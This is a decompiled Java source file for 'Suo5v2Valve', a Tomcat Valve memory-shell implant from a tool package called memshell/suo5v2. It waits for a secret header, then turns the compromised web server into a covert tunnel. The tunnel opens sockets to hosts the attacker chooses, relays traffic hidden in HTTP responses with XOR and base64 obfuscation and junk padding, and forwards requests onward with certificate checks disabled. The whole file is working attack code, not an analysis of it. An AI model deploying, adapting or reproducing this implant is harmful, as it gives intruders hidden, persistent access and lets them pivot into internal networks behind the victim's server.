/*
 * Decompiled with CFR 0.152.
 */
package com.core.template.memshell.suo5v2;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.NetworkInterface;
import java.net.Socket;
import java.net.URL;
import java.nio.ByteBuffer;
import java.nio.channels.SocketChannel;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Random;
import java.util.concurrent.BlockingQueue;
import java.util.concurrent.LinkedBlockingQueue;
import java.util.concurrent.TimeUnit;
import javax.net.ssl.HostnameVerifier;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSession;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
import javax.servlet.ServletException;
import javax.servlet.ServletInputStream;
import javax.servlet.ServletOutputStream;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.catalina.Valve;
import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.Response;

public class Suo5v2Valve
implements Valve,
Runnable,
HostnameVerifier,
X509TrustManager {
    public static String headerName;
    public static String headerValue;
    private static HashMap addrs;
    private static Hashtable ctx;
    private final String CHARACTERS = "abcdefghijklmnopqrstuvwxyz0123456789";
    private final int CHARACTERS_LENGTH = "abcdefghijklmnopqrstuvwxyz0123456789".length();
    private final int BUF_SIZE = 16384;
    private InputStream gInStream;
    private OutputStream gOutStream;
    private String gtunId;
    private int mode = 0;
    protected Valve next;
    protected boolean asyncSupported;

    public Suo5v2Valve() {
    }

    public Suo5v2Valve(InputStream in, OutputStream out, String tunId) {
        this.gInStream = in;
        this.gOutStream = out;
        this.gtunId = tunId;
    }

    public Suo5v2Valve(String tunId, int mode) {
        this.gtunId = tunId;
        this.mode = mode;
    }

    @Override
    public void invoke(Request request, Response response) throws IOException, ServletException {
        try {
            if (request.getHeader(headerName) != null && request.getHeader(headerName).contains(headerValue)) {
                new Suo5v2Valve().process(request, response);
                return;
            }
        }
        catch (Throwable throwable) {
            // empty catch block
        }
        this.getNext().invoke(request, response);
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     * Enabled aggressive block sorting
     * Enabled unnecessary exception pruning
     * Enabled aggressive exception aggregation
     */
    private void process(ServletRequest request, ServletResponse response) {
        HttpServletRequest req = (HttpServletRequest)request;
        HttpServletResponse resp = (HttpServletResponse)response;
        String sid = null;
        byte[] bodyPrefix = new byte[]{};
        try {
            ServletInputStream reqInputStream = req.getInputStream();
            HashMap dataMap = this.unmarshalBase64(reqInputStream);
            byte[] modeData = (byte[])dataMap.get("m");
            byte[] actionData = (byte[])dataMap.get("ac");
            byte[] tunIdData = (byte[])dataMap.get("id");
            byte[] sidData = (byte[])dataMap.get("sid");
            if (actionData == null) return;
            if (actionData.length != 1) return;
            if (tunIdData == null) return;
            if (tunIdData.length == 0) return;
            if (modeData == null) return;
            if (modeData.length == 0) {
                return;
            }
            if (sidData != null && sidData.length > 0) {
                sid = new String(sidData);
            }
            String tunId = new String(tunIdData);
            byte mode = modeData[0];
            switch (mode) {
                case 0: {
                    sid = this.randomString(16);
                    this.processHandshake(req, resp, dataMap, tunId, sid);
                    return;
                }
                case 1: {
                    this.setBypassHeader(resp);
                    this.processFullStream(req, resp, dataMap, tunId);
                    return;
                }
                case 2: {
                    this.setBypassHeader(resp);
                }
                case 3: {
                    byte[] bodyContent = this.toByteArray(reqInputStream);
                    if (this.processRedirect(req, resp, dataMap, bodyPrefix, bodyContent)) {
                        return;
                    }
                    if (sidData == null || sidData.length == 0 || this.getKey(new String(sidData)) == null) {
                        resp.setStatus(403);
                        return;
                    }
                    ByteArrayInputStream bodyStream = new ByteArrayInputStream(bodyContent);
                    int dirySize = this.getDirtySize(sid);
                    if (mode == 2) {
                        this.writeAndFlush(resp, this.processTemplateStart(resp, new String(sidData)), dirySize);
                        while (true) {
                            this.processHalfStream(req, resp, dataMap, tunId, dirySize);
                            try {
                                dataMap = this.unmarshalBase64(bodyStream);
                                if (dataMap.isEmpty()) break;
                                tunId = new String((byte[])dataMap.get("id"));
                            }
                            catch (Exception e) {
                                // empty catch block
                                break;
                            }
                        }
                        this.writeAndFlush(resp, this.processTemplateEnd(sid), dirySize);
                        return;
                    }
                    ByteArrayOutputStream baos = new ByteArrayOutputStream();
                    baos.write(this.processTemplateStart(resp, new String(sidData)));
                    while (true) {
                        this.processClassic(req, baos, dataMap, tunId);
                        try {
                            dataMap = this.unmarshalBase64(bodyStream);
                            if (dataMap.isEmpty()) break;
                            tunId = new String((byte[])dataMap.get("id"));
                        }
                        catch (Exception e) {
                            // empty catch block
                            break;
                        }
                    }
                    baos.write(this.processTemplateEnd(sid));
                    resp.setContentLength(baos.size());
                    this.writeAndFlush(resp, baos.toByteArray(), 0);
                    return;
                }
            }
            return;
        }
        catch (Throwable out) {
            return;
        }
        finally {
            try {
                ServletOutputStream out = resp.getOutputStream();
                out.flush();
                out.close();
            }
            catch (Throwable out) {}
        }
    }

    private void setBypassHeader(HttpServletResponse resp) {
        resp.setBufferSize(16384);
        resp.setHeader("X-Accel-Buffering", "no");
    }

    private byte[] processTemplateStart(HttpServletResponse resp, String sid) throws Exception {
        byte[] data = new byte[]{};
        Object o = this.getKey(sid);
        if (o == null) {
            return data;
        }
        String[] tplParts = (String[])o;
        if (tplParts.length != 3) {
            return data;
        }
        resp.setHeader("Content-Type", tplParts[0]);
        return tplParts[1].getBytes();
    }

    private byte[] processTemplateEnd(String sid) {
        byte[] data = new byte[]{};
        Object o = this.getKey(sid);
        if (o == null) {
            return data;
        }
        String[] tplParts = (String[])o;
        if (tplParts.length != 3) {
            return data;
        }
        return tplParts[2].getBytes();
    }

    private int getDirtySize(String sid) {
        Object o = this.getKey(sid + "_jk");
        if (o == null) {
            return 0;
        }
        return (Integer)o;
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private boolean processRedirect(HttpServletRequest req, HttpServletResponse resp, HashMap dataMap, byte[] bodyPrefix, byte[] bodyContent) throws Exception {
        boolean needRedirect;
        byte[] redirectData = (byte[])dataMap.get("r");
        dataMap.remove("r");
        boolean bl = needRedirect = redirectData != null && redirectData.length > 0;
        if (needRedirect && !this.isLocalAddr(new String(redirectData))) {
            HttpURLConnection conn = null;
            try {
                ByteArrayOutputStream baos = new ByteArrayOutputStream();
                baos.write(bodyPrefix);
                baos.write(this.marshalBase64(dataMap));
                baos.write(bodyContent);
                byte[] newBody = baos.toByteArray();
                conn = this.redirect(req, new String(redirectData), newBody);
                this.pipeStream(conn.getInputStream(), resp.getOutputStream(), false);
            }
            finally {
                if (conn != null) {
                    conn.disconnect();
                }
            }
            return true;
        }
        return false;
    }

    private void processHandshake(HttpServletRequest req, HttpServletResponse resp, HashMap dataMap, String tunId, String sid) throws Exception {
        byte[] isAutoData;
        boolean isAuto;
        boolean needRedirect;
        byte[] redirectData = (byte[])dataMap.get("r");
        boolean bl = needRedirect = redirectData != null && redirectData.length > 0;
        if (needRedirect && !this.isLocalAddr(new String(redirectData))) {
            resp.setStatus(403);
            return;
        }
        byte[] tplData = (byte[])dataMap.get("tpl");
        byte[] contentTypeData = (byte[])dataMap.get("ct");
        if (tplData != null && tplData.length > 0 && contentTypeData != null && contentTypeData.length > 0) {
            String tpl = new String(tplData);
            String[] parts = tpl.split("#data#", 2);
            this.putKey(sid, new String[]{new String(contentTypeData), parts[0], parts[1]});
        } else {
            this.putKey(sid, new String[0]);
        }
        byte[] dirtySizeData = (byte[])dataMap.get("jk");
        if (dirtySizeData != null && dirtySizeData.length > 0) {
            int dirtySize = 0;
            try {
                dirtySize = Integer.parseInt(new String(dirtySizeData));
            }
            catch (NumberFormatException numberFormatException) {
                // empty catch block
            }
            if (dirtySize < 0) {
                dirtySize = 0;
            }
            this.putKey(sid + "_jk", dirtySize);
        }
        boolean bl2 = isAuto = (isAutoData = (byte[])dataMap.get("a")) != null && isAutoData.length > 0 && isAutoData[0] == 1;
        if (isAuto) {
            this.setBypassHeader(resp);
            this.writeAndFlush(resp, this.processTemplateStart(resp, sid), 0);
            this.writeAndFlush(resp, this.marshalBase64(this.newData(tunId, (byte[])dataMap.get("dt"))), 0);
            Thread.sleep(2000L);
            this.writeAndFlush(resp, this.marshalBase64(this.newData(tunId, sid.getBytes())), 0);
            this.writeAndFlush(resp, this.processTemplateEnd(sid), 0);
        } else {
            ByteArrayOutputStream baos = new ByteArrayOutputStream();
            baos.write(this.processTemplateStart(resp, sid));
            baos.write(this.marshalBase64(this.newData(tunId, (byte[])dataMap.get("dt"))));
            baos.write(this.marshalBase64(this.newData(tunId, sid.getBytes())));
            baos.write(this.processTemplateEnd(sid));
            resp.setContentLength(baos.size());
            this.writeAndFlush(resp, baos.toByteArray(), 0);
        }
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private void processFullStream(HttpServletRequest req, HttpServletResponse resp, HashMap dataMap, String tunId) throws Exception {
        ServletInputStream reqInputStream = req.getInputStream();
        String host = new String((byte[])dataMap.get("h"));
        int port = Integer.parseInt(new String((byte[])dataMap.get("p")));
        if (port == 0) {
            port = this.getServerPort(req);
        }
        Socket socket = null;
        try {
            socket = new Socket();
            socket.setTcpNoDelay(true);
            socket.setReceiveBufferSize(131072);
            socket.setSendBufferSize(131072);
            socket.connect(new InetSocketAddress(host, port), 5000);
            this.writeAndFlush(resp, this.marshalBase64(this.newStatus(tunId, (byte)0)), 0);
        }
        catch (Exception e) {
            if (socket != null) {
                socket.close();
            }
            this.writeAndFlush(resp, this.marshalBase64(this.newStatus(tunId, (byte)1)), 0);
            return;
        }
        Thread t = null;
        boolean sendClose = true;
        try {
            HashMap newData;
            OutputStream scOutStream = socket.getOutputStream();
            InputStream scInStream = socket.getInputStream();
            ServletOutputStream respOutputStream = resp.getOutputStream();
            Suo5v2Valve p = new Suo5v2Valve(scInStream, respOutputStream, tunId);
            t = new Thread(p);
            t.start();
            while (!(newData = this.unmarshalBase64(reqInputStream)).isEmpty()) {
                byte action = ((byte[])newData.get("ac"))[0];
                switch (action) {
                    case 0: 
                    case 2: {
                        sendClose = false;
                        break;
                    }
                    case 1: {
                        byte[] data = (byte[])newData.get("dt");
                        if (data.length == 0) break;
                        scOutStream.write(data);
                        scOutStream.flush();
                        break;
                    }
                    case 16: {
                        this.writeAndFlush(resp, this.marshalBase64(this.newHeartbeat(tunId)), 0);
                        break;
                    }
                }
            }
        }
        catch (Exception exception) {
        }
        finally {
            try {
                socket.close();
            }
            catch (Exception exception) {}
            if (sendClose) {
                this.writeAndFlush(resp, this.marshalBase64(this.newDel(tunId)), 0);
            }
            if (t != null) {
                t.join();
            }
        }
    }

    private void processHalfStream(HttpServletRequest req, HttpServletResponse resp, HashMap dataMap, String tunId, int dirtySize) throws Exception {
        block12: {
            boolean newThread = false;
            boolean sendClose = true;
            try {
                byte action = ((byte[])dataMap.get("ac"))[0];
                switch (action) {
                    case 0: {
                        byte[] createData = this.performCreate(req, dataMap, tunId, newThread);
                        this.writeAndFlush(resp, createData, dirtySize);
                        Object[] objs = (Object[])this.getKey(tunId);
                        if (objs == null) {
                            throw new IOException("tunnel not found");
                        }
                        SocketChannel sc = (SocketChannel)objs[0];
                        ByteBuffer buffer = ByteBuffer.allocate(16384);
                        try {
                            byte[] data;
                            while ((data = this.readSocketChannel(sc, buffer)).length != 0) {
                                this.writeAndFlush(resp, this.marshalBase64(this.newData(tunId, data)), dirtySize);
                            }
                            break;
                        }
                        catch (Exception e) {
                            break;
                        }
                    }
                    case 1: {
                        this.performWrite(dataMap, tunId, newThread);
                        break;
                    }
                    case 2: {
                        sendClose = false;
                        this.performDelete(tunId);
                        break;
                    }
                    case 16: {
                        this.writeAndFlush(resp, this.marshalBase64(this.newHeartbeat(tunId)), dirtySize);
                    }
                }
            }
            catch (Exception e) {
                this.performDelete(tunId);
                if (!sendClose) break block12;
                this.writeAndFlush(resp, this.marshalBase64(this.newDel(tunId)), dirtySize);
            }
        }
    }

    private void processClassic(HttpServletRequest req, ByteArrayOutputStream respBodyStream, HashMap dataMap, String tunId) throws Exception {
        block7: {
            boolean sendClose = true;
            boolean newThread = true;
            try {
                byte action = ((byte[])dataMap.get("ac"))[0];
                switch (action) {
                    case 0: {
                        byte[] createData = this.performCreate(req, dataMap, tunId, newThread);
                        respBodyStream.write(createData);
                        break;
                    }
                    case 1: {
                        this.performWrite(dataMap, tunId, newThread);
                        byte[] readData = this.performRead(tunId);
                        respBodyStream.write(readData);
                        break;
                    }
                    case 2: {
                        sendClose = false;
                        this.performDelete(tunId);
                    }
                }
            }
            catch (Exception e) {
                this.performDelete(tunId);
                if (!sendClose) break block7;
                respBodyStream.write(this.marshalBase64(this.newDel(tunId)));
            }
        }
    }

    private void writeAndFlush(HttpServletResponse resp, byte[] data, int dirtySize) throws Exception {
        if (data == null || data.length == 0) {
            return;
        }
        ServletOutputStream out = resp.getOutputStream();
        out.write(data);
        if (dirtySize != 0) {
            out.write(this.marshalBase64(this.newDirtyChunk(dirtySize)));
        }
        out.flush();
        resp.flushBuffer();
    }

    private byte[] performCreate(HttpServletRequest request, HashMap dataMap, String tunId, boolean newThread) throws Exception {
        String host = new String((byte[])dataMap.get("h"));
        int port = Integer.parseInt(new String((byte[])dataMap.get("p")));
        if (port == 0) {
            port = this.getServerPort(request);
        }
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        SocketChannel socketChannel = null;
        HashMap resultData = null;
        try {
            socketChannel = SocketChannel.open();
            socketChannel.socket().setTcpNoDelay(true);
            socketChannel.socket().setReceiveBufferSize(131072);
            socketChannel.socket().setSendBufferSize(131072);
            socketChannel.socket().connect(new InetSocketAddress(host, port), 3000);
            socketChannel.configureBlocking(true);
            resultData = this.newStatus(tunId, (byte)0);
            LinkedBlockingQueue readQueue = new LinkedBlockingQueue(100);
            LinkedBlockingQueue writeQueue = new LinkedBlockingQueue();
            this.putKey(tunId, new Object[]{socketChannel, readQueue, writeQueue});
            if (newThread) {
                new Thread(new Suo5v2Valve(tunId, 1)).start();
                new Thread(new Suo5v2Valve(tunId, 2)).start();
            }
        }
        catch (Exception e) {
            if (socketChannel != null) {
                try {
                    socketChannel.close();
                }
                catch (Exception exception) {
                    // empty catch block
                }
            }
            resultData = this.newStatus(tunId, (byte)1);
        }
        baos.write(this.marshalBase64(resultData));
        return baos.toByteArray();
    }

    private void performWrite(HashMap dataMap, String tunId, boolean newThread) throws Exception {
        Object[] objs = (Object[])this.getKey(tunId);
        if (objs == null) {
            throw new IOException("tunnel not found");
        }
        SocketChannel sc = (SocketChannel)objs[0];
        if (!sc.isConnected()) {
            throw new IOException("socket not connected");
        }
        byte[] data = (byte[])dataMap.get("dt");
        if (data.length != 0) {
            if (newThread) {
                BlockingQueue writeQueue = (BlockingQueue)objs[2];
                writeQueue.put(data);
            } else {
                ByteBuffer buf = ByteBuffer.wrap(data);
                while (buf.hasRemaining()) {
                    sc.write(buf);
                }
            }
        }
    }

    private byte[] performRead(String tunId) throws Exception {
        byte[] data;
        Object[] objs = (Object[])this.getKey(tunId);
        if (objs == null) {
            throw new IOException("tunnel not found");
        }
        SocketChannel sc = (SocketChannel)objs[0];
        if (!sc.isConnected()) {
            throw new IOException("socket not connected");
        }
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        BlockingQueue readQueue = (BlockingQueue)objs[1];
        int maxSize = 524288;
        int written = 0;
        while ((data = (byte[])readQueue.poll()) != null) {
            baos.write(this.marshalBase64(this.newData(tunId, data)));
            if ((written += data.length) < maxSize) continue;
            break;
        }
        return baos.toByteArray();
    }

    private void performDelete(String tunId) {
        Object[] objs = (Object[])this.getKey(tunId);
        if (objs != null) {
            this.removeKey(tunId);
            SocketChannel sc = (SocketChannel)objs[0];
            BlockingQueue writeQueue = (BlockingQueue)objs[2];
            try {
                writeQueue.put(new byte[0]);
                sc.close();
            }
            catch (Exception exception) {
                // empty catch block
            }
        }
    }

    private int getServerPort(HttpServletRequest request) throws Exception {
        int port;
        try {
            port = (Integer)request.getClass().getMethod("getLocalPort", new Class[0]).invoke((Object)request, new Object[0]);
        }
        catch (Exception e) {
            port = (Integer)request.getClass().getMethod("getServerPort", new Class[0]).invoke((Object)request, new Object[0]);
        }
        return port;
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    private void pipeStream(InputStream inputStream, OutputStream outputStream, boolean needMarshal) throws Exception {
        try {
            int n;
            byte[] readBuf = new byte[8192];
            while ((n = inputStream.read(readBuf)) > 0) {
                byte[] dataTmp = this.copyOfRange(readBuf, 0, 0 + n);
                if (needMarshal) {
                    dataTmp = this.marshalBase64(this.newData(this.gtunId, dataTmp));
                }
                outputStream.write(dataTmp);
                outputStream.flush();
            }
        }
        finally {
            if (inputStream != null) {
                try {
                    inputStream.close();
                }
                catch (Exception exception) {}
            }
        }
    }

    private byte[] readSocketChannel(SocketChannel socketChannel, ByteBuffer buffer) throws IOException {
        buffer.clear();
        int bytesRead = socketChannel.read(buffer);
        if (bytesRead <= 0) {
            return new byte[0];
        }
        buffer.flip();
        byte[] data = new byte[buffer.remaining()];
        buffer.get(data);
        return data;
    }

    private static HashMap collectAddr() {
        HashMap<String, Boolean> addrs = new HashMap<String, Boolean>();
        try {
            Enumeration<NetworkInterface> nifs = NetworkInterface.getNetworkInterfaces();
            while (nifs.hasMoreElements()) {
                NetworkInterface nif = nifs.nextElement();
                Enumeration<InetAddress> addresses = nif.getInetAddresses();
                while (addresses.hasMoreElements()) {
                    InetAddress addr = addresses.nextElement();
                    String s = addr.getHostAddress();
                    if (s == null) continue;
                    int ifaceIndex = s.indexOf(37);
                    if (ifaceIndex != -1) {
                        s = s.substring(0, ifaceIndex);
                    }
                    addrs.put(s, Boolean.TRUE);
                }
            }
        }
        catch (Exception exception) {
            // empty catch block
        }
        return addrs;
    }

    private boolean isLocalAddr(String url) throws Exception {
        String ip = new URL(url).getHost();
        return addrs.containsKey(ip);
    }

    private HttpURLConnection redirect(HttpServletRequest request, String rUrl, byte[] body) throws Exception {
        String method = request.getMethod();
        URL u = new URL(rUrl);
        HttpURLConnection conn = (HttpURLConnection)u.openConnection();
        conn.setRequestMethod(method);
        try {
            conn.getClass().getMethod("setConnectTimeout", Integer.TYPE).invoke((Object)conn, new Integer(3000));
            conn.getClass().getMethod("setReadTimeout", Integer.TYPE).invoke((Object)conn, new Integer(0));
        }
        catch (Exception exception) {
            // empty catch block
        }
        conn.setDoOutput(true);
        conn.setDoInput(true);
        if (HttpsURLConnection.class.isInstance(conn)) {
            ((HttpsURLConnection)conn).setHostnameVerifier(this);
            SSLContext sslCtx = SSLContext.getInstance("SSL");
            sslCtx.init(null, new TrustManager[]{this}, null);
            ((HttpsURLConnection)conn).setSSLSocketFactory(sslCtx.getSocketFactory());
        }
        Enumeration<String> headers = request.getHeaderNames();
        while (headers.hasMoreElements()) {
            String k = headers.nextElement();
            if (k.equalsIgnoreCase("Content-Length")) {
                conn.setRequestProperty(k, String.valueOf(body.length));
                continue;
            }
            if (k.equalsIgnoreCase("Host")) {
                conn.setRequestProperty(k, u.getHost());
                continue;
            }
            if (k.equalsIgnoreCase("Connection")) {
                conn.setRequestProperty(k, "close");
                continue;
            }
            if (k.equalsIgnoreCase("Content-Encoding") || k.equalsIgnoreCase("Transfer-Encoding")) continue;
            conn.setRequestProperty(k, request.getHeader(k));
        }
        OutputStream rout = conn.getOutputStream();
        rout.write(body);
        rout.flush();
        rout.close();
        conn.getResponseCode();
        return conn;
    }

    private byte[] toByteArray(InputStream in) {
        try {
            int len;
            ByteArrayOutputStream baos = new ByteArrayOutputStream();
            byte[] buffer = new byte[4096];
            while ((len = in.read(buffer)) != -1) {
                baos.write(buffer, 0, len);
            }
            return baos.toByteArray();
        }
        catch (IOException var5) {
            return new byte[0];
        }
    }

    private void readFull(InputStream is, byte[] b) throws IOException {
        int readResult;
        for (int bufferOffset = 0; bufferOffset < b.length; bufferOffset += readResult) {
            int readLength = b.length - bufferOffset;
            readResult = is.read(b, bufferOffset, readLength);
            if (readResult != -1) continue;
            throw new IOException("stream EOF");
        }
    }

    public HashMap newDirtyChunk(int size) {
        HashMap<String, byte[]> m = new HashMap<String, byte[]>();
        m.put("ac", new byte[]{17});
        if (size > 0) {
            byte[] data = new byte[size];
            new Random().nextBytes(data);
            m.put("d", data);
        }
        return m;
    }

    private HashMap newData(String tunId, byte[] data) {
        HashMap<String, byte[]> m = new HashMap<String, byte[]>();
        m.put("ac", new byte[]{1});
        m.put("dt", data);
        m.put("id", tunId.getBytes());
        return m;
    }

    private HashMap newDel(String tunId) {
        HashMap<String, byte[]> m = new HashMap<String, byte[]>();
        m.put("ac", new byte[]{2});
        m.put("id", tunId.getBytes());
        return m;
    }

    private HashMap newStatus(String tunId, byte b) {
        HashMap<String, byte[]> m = new HashMap<String, byte[]>();
        m.put("ac", new byte[]{3});
        m.put("s", new byte[]{b});
        m.put("id", tunId.getBytes());
        return m;
    }

    private HashMap newHeartbeat(String tunId) {
        HashMap<String, byte[]> m = new HashMap<String, byte[]>();
        m.put("ac", new byte[]{16});
        m.put("id", tunId.getBytes());
        return m;
    }

    private byte[] u32toBytes(int i) {
        byte[] result = new byte[]{(byte)(i >> 24), (byte)(i >> 16), (byte)(i >> 8), (byte)i};
        return result;
    }

    private int bytesToU32(byte[] bytes) {
        return (bytes[0] & 0xFF) << 24 | (bytes[1] & 0xFF) << 16 | (bytes[2] & 0xFF) << 8 | (bytes[3] & 0xFF) << 0;
    }

    private void putKey(String k, Object v) {
        ctx.put(k, v);
    }

    private Object getKey(String k) {
        return ctx.get(k);
    }

    private void removeKey(String k) {
        ctx.remove(k);
    }

    private byte[] copyOfRange(byte[] original, int from, int to) {
        int newLength = to - from;
        if (newLength < 0) {
            throw new IllegalArgumentException(from + " > " + to);
        }
        byte[] copy = new byte[newLength];
        int copyLength = Math.min(original.length - from, newLength);
        for (int i = 0; i < copyLength; ++i) {
            copy[i] = original[from + i];
        }
        return copy;
    }

    private String base64UrlEncode(byte[] bs) throws Exception {
        Class<?> base64;
        String value = null;
        try {
            base64 = Class.forName("java.util.Base64");
            Object Encoder2 = base64.getMethod("getEncoder", new Class[0]).invoke(base64, new Object[0]);
            value = (String)Encoder2.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder2, new Object[]{bs});
        }
        catch (Exception e) {
            try {
                base64 = Class.forName("sun.misc.BASE64Encoder");
                Object Encoder3 = base64.newInstance();
                value = (String)Encoder3.getClass().getMethod("encode", byte[].class).invoke(Encoder3, new Object[]{bs});
                value = value.replaceAll("\\s+", "");
            }
            catch (Exception exception) {
                // empty catch block
            }
        }
        if (value != null) {
            value = value.replace('+', '-').replace('/', '_');
            while (value.endsWith("=")) {
                value = value.substring(0, value.length() - 1);
            }
        }
        return value;
    }

    private byte[] base64UrlDecode(String bs) throws Exception {
        if (bs == null) {
            return null;
        }
        bs = bs.replace('-', '+').replace('_', '/');
        while (bs.length() % 4 != 0) {
            bs = bs + "=";
        }
        byte[] value = null;
        try {
            Class<?> base64 = Class.forName("java.util.Base64");
            Object decoder = base64.getMethod("getDecoder", new Class[0]).invoke(base64, new Object[0]);
            value = (byte[])decoder.getClass().getMethod("decode", String.class).invoke(decoder, bs);
        }
        catch (Exception e) {
            try {
                Class<?> base64 = Class.forName("sun.misc.BASE64Decoder");
                Object decoder = base64.newInstance();
                value = (byte[])decoder.getClass().getMethod("decodeBuffer", String.class).invoke(decoder, bs);
            }
            catch (Exception exception) {
                // empty catch block
            }
        }
        return value;
    }

    private byte[] marshalBase64(HashMap m) throws Exception {
        Random random = new Random();
        int junkSize = random.nextInt(32);
        if (junkSize > 0) {
            byte[] junk = new byte[junkSize];
            random.nextBytes(junk);
            m.put("_", junk);
        }
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        Object[] keys = m.keySet().toArray();
        for (int i = 0; i < keys.length; ++i) {
            String key = (String)keys[i];
            byte[] value = (byte[])m.get(key);
            buf.write((byte)key.length());
            buf.write(key.getBytes());
            buf.write(this.u32toBytes(value.length));
            buf.write(value);
        }
        byte[] key = new byte[]{(byte)(Math.random() * 255.0 + 1.0), (byte)(Math.random() * 255.0 + 1.0)};
        byte[] data = buf.toByteArray();
        for (int i = 0; i < data.length; ++i) {
            data[i] = (byte)(data[i] ^ key[i % 2]);
        }
        data = this.base64UrlEncode(data).getBytes();
        ByteBuffer dbuf = ByteBuffer.allocate(6);
        dbuf.put(key);
        dbuf.putInt(data.length);
        byte[] headerData = dbuf.array();
        for (int i = 2; i < 6; ++i) {
            headerData[i] = (byte)(headerData[i] ^ key[i % 2]);
        }
        headerData = this.base64UrlEncode(headerData).getBytes();
        dbuf = ByteBuffer.allocate(8 + data.length);
        dbuf.put(headerData);
        dbuf.put(data);
        return dbuf.array();
    }

    private HashMap unmarshalBase64(InputStream in) throws Exception {
        int vLen;
        HashMap<String, byte[]> m = new HashMap<String, byte[]>();
        byte[] header = new byte[8];
        this.readFull(in, header);
        header = this.base64UrlDecode(new String(header));
        if (header == null || header.length == 0) {
            return m;
        }
        byte[] xor = new byte[]{header[0], header[1]};
        for (int i = 2; i < 6; ++i) {
            header[i] = (byte)(header[i] ^ xor[i % 2]);
        }
        ByteBuffer bb = ByteBuffer.wrap(header, 2, 4);
        int len = bb.getInt();
        if (len > 0x2000000) {
            throw new IOException("invalid len");
        }
        byte[] bs = new byte[len];
        this.readFull(in, bs);
        bs = this.base64UrlDecode(new String(bs));
        for (int i = 0; i < bs.length; ++i) {
            bs[i] = (byte)(bs[i] ^ xor[i % 2]);
        }
        for (int i = 0; i < bs.length; i += vLen) {
            int kLen;
            if (++i + (kLen = bs[i] & 0xFF) > bs.length) {
                throw new Exception("key len error");
            }
            byte[] buf = this.copyOfRange(bs, i, i + kLen);
            String key = new String(buf);
            if ((i += kLen) + 4 > bs.length) {
                throw new Exception("value len error");
            }
            buf = this.copyOfRange(bs, i, i + 4);
            vLen = this.bytesToU32(buf);
            i += 4;
            if (vLen < 0) {
                throw new Exception("value error");
            }
            if (i + vLen > bs.length) {
                throw new Exception("value error");
            }
            byte[] value = this.copyOfRange(bs, i, i + vLen);
            m.put(key, value);
        }
        return m;
    }

    private String randomString(int length) {
        if (length <= 0) {
            return "";
        }
        Random random = new Random();
        char[] randomChars = new char[length];
        for (int i = 0; i < length; ++i) {
            int randomIndex = random.nextInt(this.CHARACTERS_LENGTH);
            randomChars[i] = "abcdefghijklmnopqrstuvwxyz0123456789".charAt(randomIndex);
        }
        return new String(randomChars);
    }

    @Override
    public boolean verify(String hostname, SSLSession session) {
        return true;
    }

    @Override
    public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
    }

    @Override
    public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
    }

    @Override
    public X509Certificate[] getAcceptedIssuers() {
        return new X509Certificate[0];
    }

    /*
     * WARNING - Removed try catching itself - possible behaviour change.
     */
    @Override
    public void run() {
        block21: {
            if (this.mode == 0) {
                try {
                    this.pipeStream(this.gInStream, this.gOutStream, true);
                }
                catch (Exception exception) {
                    // empty catch block
                }
                return;
            }
            Object[] objs = (Object[])this.getKey(this.gtunId);
            if (objs == null || objs.length != 3) {
                return;
            }
            SocketChannel sc = (SocketChannel)objs[0];
            BlockingQueue readQueue = (BlockingQueue)objs[1];
            BlockingQueue writeQueue = (BlockingQueue)objs[2];
            boolean selfClean = false;
            try {
                if (this.mode == 1) {
                    byte[] data;
                    ByteBuffer buffer = ByteBuffer.allocate(16384);
                    do {
                        if ((data = this.readSocketChannel(sc, buffer)).length != 0) continue;
                        break block21;
                    } while (readQueue.offer(data, 60L, TimeUnit.SECONDS));
                    selfClean = true;
                    break block21;
                }
                block14: while (true) {
                    byte[] data;
                    if ((data = (byte[])writeQueue.poll(300L, TimeUnit.SECONDS)) == null || data.length == 0) {
                        selfClean = true;
                        break;
                    }
                    ByteBuffer buf = ByteBuffer.wrap(data);
                    while (true) {
                        if (!buf.hasRemaining()) continue block14;
                        sc.write(buf);
                    }
                    break;
                }
            }
            catch (Exception exception) {
            }
            finally {
                if (selfClean) {
                    this.removeKey(this.gtunId);
                }
                readQueue.clear();
                writeQueue.clear();
                try {
                    writeQueue.put(new byte[0]);
                    sc.close();
                }
                catch (Exception exception) {}
            }
        }
    }

    @Override
    public Valve getNext() {
        return this.next;
    }

    @Override
    public void setNext(Valve valve) {
        this.next = valve;
    }

    @Override
    public boolean isAsyncSupported() {
        return this.asyncSupported;
    }

    @Override
    public void backgroundProcess() {
    }

    static {
        addrs = Suo5v2Valve.collectAddr();
        ctx = new Hashtable();
    }
}

